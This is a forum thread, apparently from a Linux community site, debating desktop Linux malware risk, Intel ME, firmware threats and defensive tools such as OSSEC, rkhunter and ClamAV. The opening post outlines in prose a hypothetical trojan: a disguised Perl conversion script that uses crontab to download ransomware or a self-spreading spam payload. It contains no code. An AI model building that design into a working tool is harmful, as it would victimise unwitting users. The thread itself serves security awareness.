It's a serious lack of imagination to think that just because of the root/user separation that linux users are immune from malware.

What about this ...

Write an FLAC-to-MP3 script in perl, embed within it a short downloader for malware with a crontab - command in it and get it hosted/posted somewhere

At dark o'clock in the morning it contacts the nasty disposable server and downloads the malware proper which
1) encrypts all my files and sends the key off to far-away ransom land or
2) reads through /var/spool/mail or scans thunderbird db for email addresses and sends copies of itself "Dude, you gotta try this..." style or just spams them with viagra ads.

None of this requires more than user rights

Yes, you might be clued, but what about your granny or kid brother?

In a Desktop environment, it is a simple matter to prohibit remote logins (or even place it on a toggle for when you need it) which makes 99% of exploits impossible. IMHO possibly the greatest threat is that there are so few viable threats it is all too common to become complacent. I've run Samhain and TripWire in the past as well as setting iptables to monitor all connection attempts continuously on display (even by port ranges) and one by one they all fell into disuse from lack of any threat in almost 20 years. I have relied on a hardware firewall, strict control of running services, and monthly rkhunter runs for 5 years now and still have yet to log an actual threat of any kind. I do apply security patches and update browsers but have never run any Anti Virus software on Slackware. For Desktop use it is simply superfluous IMHO.

YEs it's quite possible.
But if it's so easy theoretically, why is so hard in real world?

MAybe FLAC-to-MP3 script in perl is so simple that any complexity is suspicious and will not work simply and blindly by clicking the mouse :-)

But Yes .It's known path of potential malware propagation.
Knowledge of this is also part of the security :-)
It's better than "safest" "unknown" system behind 77 firewalls IMHO.

One question: what is /etc/cron.deny ???? if you know path.

A similar case .
In 2011, J. Rutkowska announced that it is built in keylogger on Linux . Xorg . Eureka .
Many years have passed and no one somehow did not use the "big hole" in perception of Windows world.
Your example of the cron would make a nice it exploited .
Rutkowska is also a child of Windows. In that world it is unthinkable .
Learned from practice knowledge of one need not be the same in the second.

But no doubt these are some weaknesses by design. The knowledge of this gives us an advantage over the attacker and do not need to panic immediately .
There are many ways of neutralizing them in Linux if you 're afraid . It's not Windows .

http://www.zdnet.com/article/incompe...r-ddos-botnet/

If you're running an SSH server and not using PKI, you need your head examined.

2 members found this post helpful.

PEBCAK is often the biggest source of idiocy. When in doubt, just add a layer of security and use common sense. Even if it seems meaningless, you never know.

To assist the best security to your Linux server such that to secure it from Virus/malware attack one should go for a Linux firewall that features all of the security and provide a centralized network access control from Administrator side

By the way.

Malvare gone beyond the OS-es.

https://www.youtube.com/watch?v=rcwn...&nohtml5=False

If memory serves, some of the malware aimed at Macs targeted not just the OS, but the firmware.

Thank you for the link. She truly has a unique and proper perspective regarding security. I was aware that UEFI, a sorely needed improvement in BIOS if only in the size to improve capability but shockingly superficial in implementation so far but now I see why.... Intel ME and it's Master Plan to give embedded proprietary hardware the upperhand (arms, shoulders, legs and feet) which, as Joanna pointed out, wouldn't be too bad if the User/Owner (hesitated typing "Owner" since that may become moot and/or meaningless) was given the sort of control that could coexist with "proprietary" but create at least a truly trustworthy system free of user info data mining and the backdoors to use it.

Her talk made me look up Lenovo X60s to see if I could live with the power limitations to get improved security at the hardware layer and they're so cheap I'm going to get one to play with and see for myself. On paper, they look like some versions can work just fine for several years yet. With an SSD or a 7200 rpm hdd and the 2 core CPU at almost 2GHz with 4GB Ram it looks like the Intel GMA 950 is the only moderately weak spot and even that is capable of 2048x1536. Lenovo X60 Detailed Specs Thank you Microsoft! Surely did drive that price down LOL.

Yes, I'll also say thanks for the link. A very interesting presentaton.

I had heard of ME but had no idea what it actually is! All my old, recycled hardware is looking very good indeed!

With acceptance of ME in the CPU and the ubiquitous man-in-the-middle on the net (CloudFlare), it is a cruel joke to talk seriously about digital privacy and security.

Minifree sell ThinkPad refurbs with the Intel ME disabled and coreboot preinstalled. Be aware however that if you're interested in Qubes OS, the Minifree ThinkPads don't have IOMMU for network VM isolation (as far as I know). Slackware 14.1 runs just nicely on my X200 though.

Disclaimer: please don't tell me that the laptops are old and decrepit, I don't care, these are some of the only laptops certified by the FSF and I'm just posting it for those that are interested.

AVG has a version for linux and it installs as a daemon too

I mention it because for windows, for me, avg is the safe option. And we could say
they do have very updated databases.

On the other hand, i don't remember it had a gui, just the daemon and several command line programs

What I use on my machine (Internet facing, SSH-only server):

* OSSEC for intrusion/binary modification detection
* DenyHosts to protect from OpenSSH abuse
* ClamAV to scan downloaded files (and only downloaded files)
* Both chkrootkit (with personal patches) and rkhunter to check for potential rootkits

All of these are updated on a daily basis.

All firewall duties are delegated to my ADSL router.

I also scan my machine from the Internet from time to time to make sure nothing untoward has appeared.

I update my machine religiously and check for updates daily as well.

AVG no longer offers a linux version. Windows, MAC and Android only these days

Do you run a software firewall on your PC? Some NAT routers are vulnerable to attacks.